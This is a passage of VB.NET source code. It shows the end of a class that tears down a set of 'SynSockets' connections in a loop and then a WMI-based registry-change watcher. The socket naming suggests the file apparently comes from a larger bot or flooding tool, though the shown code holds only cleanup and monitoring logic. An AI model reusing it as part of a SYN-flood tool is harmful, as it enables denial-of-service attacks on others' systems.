2251 Next
2252 Me.Sock = Nothing
2253 GoTo Label_0000
2254 Catch
2255 For num = 0 To Me.SynSockets - 1
2256 Try
2257 If Me.Sock(num).Connected Then
2258 Me.Sock(num).Disconnect(False)
2259 End If
2260 Me.Sock(num).Close()
2261 Me.Sock(num) = Nothing
2262 Catch
2263 End Try
2264 Next
2265 GoTo Label_0000
2266 End Try
2267 End Sub
2268 End Class
2269 End Class
2270 Public Class RegistryWatcher
2271 Public MonitorCollection As New Collections.Generic.Dictionary(Of String, Monitor)
2272 Public Event RegistryChanged(ByVal M As Monitor)
2273 Public Enum HKEY_ROOTS As Integer
2274 HKEY_CLASSES_ROOT = 0
2275 HKEY_CURRENT_USER = 1
2276 HKEY_LOCAL_MACHINE = 2
2277 HKEY_USERS = 3
2278 HKEY_CURRENT_CONFIG = 4
2279 End Enum
2280 Public Sub AddWatcher(ByVal Root As HKEY_ROOTS, ByVal Path As String, ByVal ID As String, Optional ByVal Value As String = "")
2281 If MonitorCollection.ContainsKey(ID) = False Then
2282 Dim RegMon As New Monitor(Root, Path, ID, Value)
2283 AddHandler RegMon.Changed, AddressOf OnRegistryChanged
2284 MonitorCollection.Add(ID, RegMon)
2285 End If
2286 End Sub
2287 Public Sub RemoveWatcher(ByVal ID As String)
2288 If MonitorCollection.ContainsKey(ID) = True Then
2289 MonitorCollection(ID).StopWatch()
2290 MonitorCollection.Remove(ID)
2291 End If
2292 End Sub
2293 Private Sub OnRegistryChanged(ByVal M As Monitor)
2294 RaiseEvent RegistryChanged(M)
2295 End Sub
2296 Public Class Monitor
2297 Private mRoot As HKEY_ROOTS
2298 Private mPath As String
2299 Private mID As String
2300 Private mValue As String
2301 Private mStop As Boolean
2302 Public ReadOnly Property Root() As HKEY_ROOTS
2303 Get
2304 Return mRoot
2305 End Get
2306 End Property
2307 Public ReadOnly Property Path() As String
2308 Get
2309 Return mPath
2310 End Get
2311 End Property
2312 Public ReadOnly Property ID() As String
2313 Get
2314 Return mID
2315 End Get
2316 End Property
2317 Public ReadOnly Property Value() As String
2318 Get
2319 Return mValue
2320 End Get
2321 End Property
2322 Public Event Changed(ByVal M As Monitor)
2323 Sub New(ByVal NewRoot As HKEY_ROOTS, ByVal NewPath As String, ByVal NewID As String, ByVal NewValue As String)
2324 mRoot = NewRoot
2325 mPath = NewPath
2326 mID = NewID
2327 mValue = NewValue
2328
2329 Dim T As New Threading.Thread(AddressOf Watcher)
2330 T.Start()
2331 End Sub
2332 Public Sub StopWatch()
2333 mStop = True
2334 End Sub
2335 Private Sub Watcher()
2336 Dim WMIObject As Object
2337 Dim WMIEvent As Object
2338 Dim WMICurrEvent As Object
2339
2340 mPath = Replace(mPath, "\", "\\")
2341
2342 WMIObject = GetObject("winmgmts:\\.\root\default")
2343
2344 If mValue = "" Then
2345 WMIEvent = WMIObject.ExecNotificationQuery(
2346 "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='" &
2347 mRoot.ToString & "' AND " & "KeyPath='" & mPath & "'")
2348 Else
2349 WMIEvent = WMIObject.ExecNotificationQuery(
2350 "SELECT * FROM RegistryValueChangeEvent WHERE Hive='" &
2351 mRoot.ToString & "' AND " & "KeyPath='" & mPath & "' AND ValueName='" & mValue & "'")
2352 End If
2353
2354 Do
2355 Try
2356 If mStop = True Then
2357 mStop = False
2358 Exit Sub
2359 End If
2360 WMICurrEvent = WMIEvent.NextEvent(500)
2361 RaiseEvent Changed(Me)
2362 Catch ex As Exception
2363 End Try
2364 Loop
2365 End Sub
2366 End Class
2367 End Class
2368#End Region